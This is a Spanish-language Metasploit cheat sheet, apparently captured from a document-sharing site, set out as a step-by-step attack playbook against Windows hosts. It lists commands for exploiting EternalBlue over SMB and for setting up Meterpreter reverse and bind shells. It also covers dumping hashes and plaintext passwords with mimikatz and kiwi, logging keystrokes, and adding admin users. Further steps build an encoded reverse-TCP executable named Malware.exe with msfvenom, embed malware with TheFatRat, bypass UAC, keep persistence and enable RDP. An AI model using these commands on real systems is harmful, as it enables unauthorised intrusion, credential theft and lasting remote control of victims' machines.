Está en la página 1de 3

MSFCONSOLE

searchsploit [NOMBRE_EXPLOIT]

variables:
lhost
rhost
rport
lport

ESCANEO CON METASPLOIT


use auxiliary/scanner/[tipodeescaneo]
use auxiliary/scanner/smb/smb_ms17_010
auxiliary(scanner/smb/smb_ms17_010) > show info
show options
set RHOST [direccion_IP]
run ó exploit
back

msf5 > use exploit/windows/smb/ms17_010_eternalblue


msf5 exploit(windows/smb/ms17_010_eternalblue) > show info
show targets
show options
set RHOST [direccion_IP]
set payload
run ó exploit
background = deja la sesion
abierta con persistencia
sessions [# sesion]

METERPRETER
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload
windows/x64/meterpreter/reverse_tcp
set PAYLOAD
generic/shell_bind_tcp
set PAYLOAD
generic/shell_reverse_tcp

show options

cambiar de meterpreter a shell con


el comando shel y viceversa ^C

COMANDOS METERPRETER
help
sysinfo
getuid
getsystem -h
getprivs -h
hashdump
ps = arbol de procesos
getpid= identificar el proceso usado por meterpreter
pwd = ver la ruta donde te encuentro
migrate[PID] = elevar privilegios
SACAR LAS PASSWD EN TEXTO PLANO
load mimikatz
mimikatz_command
kerberos
KEYLOGGER
keyscan_start
keyscan_dump
COMANDOS SHELL
net user
net user [username] [password] = ver usuarios
net user [username] [password] /add = añadir un usuario
net user [username] = ver informacion del usuario
net localgroup administrators [username] /add = dar privilegios de administracion
net user [username] /delete = borrar un usuario

MSFVENOM
msfvenom --list archs = listar arquitecturas compatibles
msfvenom --list platforms = listar plataformas compatibles
msfvenom --list payloads = listado de payloads
msfvenom --list encoders = listado de encoders
msfvenom --list formats = listado de formatos
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter_reverse_tcp
LHOST=[ip_localhost] LPORT=[puerto_local4444] -e x86/shikata_ga_nai -b '\x00' -i 3
-f exe -o text.exe
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter_reverse_tcp
LHOST=10.88.0.225 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe -o
Malware.exe

THE FAT RAT


git clone https://github.com/Screetsec/TheFatRat.git = herramienta para embeber el
malware
chmod +x setup.sh
./setup.sh
fatrat
opcion 6 = PWNWIND
MULTIHANDLER
use exploit/multi/handler
debe tener el mismo puerto e ip del malware creado con fat rat y estar a la escucha
en metasploit con multihandler con el mismo LHOSTy rport

POST EXPLOTACION
use exploit/windows/local/bypassuac_injection
show options
set session [numero session activa]
set LPORT [numero de puerto diferente al de la session de multihandler]
set LHOST [misma ip de la session de multihandler]
show targets
set target [numero de target es decir x64 o x86]
set payload windows/x64/meterpreter/reverse_tcp
load kiwi
creds_all
load mimikatz
kerberoz
run persistence -u -i 5 -p [puerto_session_privs] -r [ip_lhost] = mantener
persistencia
nc -nv [ip_equiporemoto] 3389 = verificar si tiene escritorio remoto
use post/windows/manage/enable_rdp
show options
set username [nuevo_username]
set password [nueva_clave]
set session [session_conprivilegiosde_postexploit]
run
rdesktop [ip_RHOST]

hexeditor [nombredelmalware] = analisis en reversing

También podría gustarte